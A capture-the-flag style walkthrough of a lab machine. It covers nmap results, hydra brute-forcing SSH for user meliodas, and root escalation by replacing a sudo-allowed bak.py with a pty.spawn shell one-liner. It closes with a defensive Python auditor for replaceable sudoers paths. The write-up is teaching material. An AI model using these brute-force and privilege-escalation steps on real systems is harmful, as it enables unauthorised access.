Nmap Results →

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 12:06 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:06 (0:00:06 remaining)
Nmap scan report for 10.10.84.240
Host is up (0.045s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
|   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_  256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to  Blog - Library Machine
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.1 (92%), Android 7.1.1 - 7.1.2 (92%), Linux 3.13 (92%), Linux 3.2 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   45.22 ms 10.11.0.1
2   45.13 ms 10.10.84.240

So let's go to the page and enumerate it to see what information we can get. Here we see hints for a username, meliodas. Now that we have that username, let's try hydra and brute-force SSH with rockyou.txt, and guess what, it worked for us. Let's log in to SSH with meliodas's credentials. When we run sudo -l, we can see that we can run /usr/bin/python * /home/meliodas/bak.py as sudo. The script sits in our own home directory, so we can replace it with one that spawns a TTY shell:

$ rm /home/meliodas/bak.py
$ echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py

Running the script through that sudo rule then gives us a root shell.
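
From the defender's side, the misconfiguration here is a sudo rule that points at a script the unprivileged user can replace. The following is an added example, not part of the original write-up, that audits a sudoers command for such paths. The ownership and modes in SAMPLE_FS, uid 1000 for meliodas and the /opt/backup location are assumptions; group permissions and ACLs are ignored.

```python
import os, shlex, stat

# Constructed model: path -> (owner uid, mode). Ownership and modes are assumptions.
SAMPLE_FS = {
    "/": (0, 0o40755), "/usr": (0, 0o40755), "/usr/bin": (0, 0o40755),
    "/usr/bin/python": (0, 0o100755),
    "/home": (0, 0o40755), "/home/meliodas": (1000, 0o40755),
    "/home/meliodas/bak.py": (0, 0o100644),
    # Hypothetical hardened location: root-owned all the way down.
    "/opt": (0, 0o40755), "/opt/backup": (0, 0o40755),
    "/opt/backup/bak.py": (0, 0o100644),
}

def real_stat(path):
    st = os.stat(path)
    return st.st_uid, st.st_mode

def can_replace(path, uid, stat_fn=real_stat):
    """Return the path component that lets `uid` change the file, or None.
    Simplified: owner and world-write bits only (no groups, no ACLs)."""
    path = os.path.normpath(path)
    owner, mode = stat_fn(path)
    if owner == uid or mode & stat.S_IWOTH:
        return path  # the file itself can be rewritten
    child = path
    while child != "/":
        parent = os.path.dirname(child)
        p_owner, p_mode = stat_fn(parent)
        c_owner, _ = stat_fn(child)
        writable = p_owner == uid or p_mode & stat.S_IWOTH
        # In a sticky directory only the owner of the entry or directory may remove it.
        sticky_ok = not (p_mode & stat.S_ISVTX) or uid in (p_owner, c_owner)
        if writable and sticky_ok:
            return parent  # entry can be deleted and recreated here
        child = parent
    return None

def audit_rule(command, uid, stat_fn=real_stat):
    """Map each absolute path in a sudoers command to what makes it replaceable."""
    findings = {}
    for token in shlex.split(command):
        if token.startswith("/") and "*" not in token:  # wildcards are not resolved
            hit = can_replace(token, uid, stat_fn)
            if hit:
                findings[token] = hit
    return findings

if __name__ == "__main__":
    for rule in ("/usr/bin/python * /home/meliodas/bak.py",
                 "/usr/bin/python /opt/backup/bak.py"):
        print(rule, "->", audit_rule(rule, 1000, SAMPLE_FS.__getitem__) or "ok")
```

On a live host, omit the stat_fn argument so the check reads real ownership with os.stat; any finding means the rule should target a root-owned file in a root-owned directory.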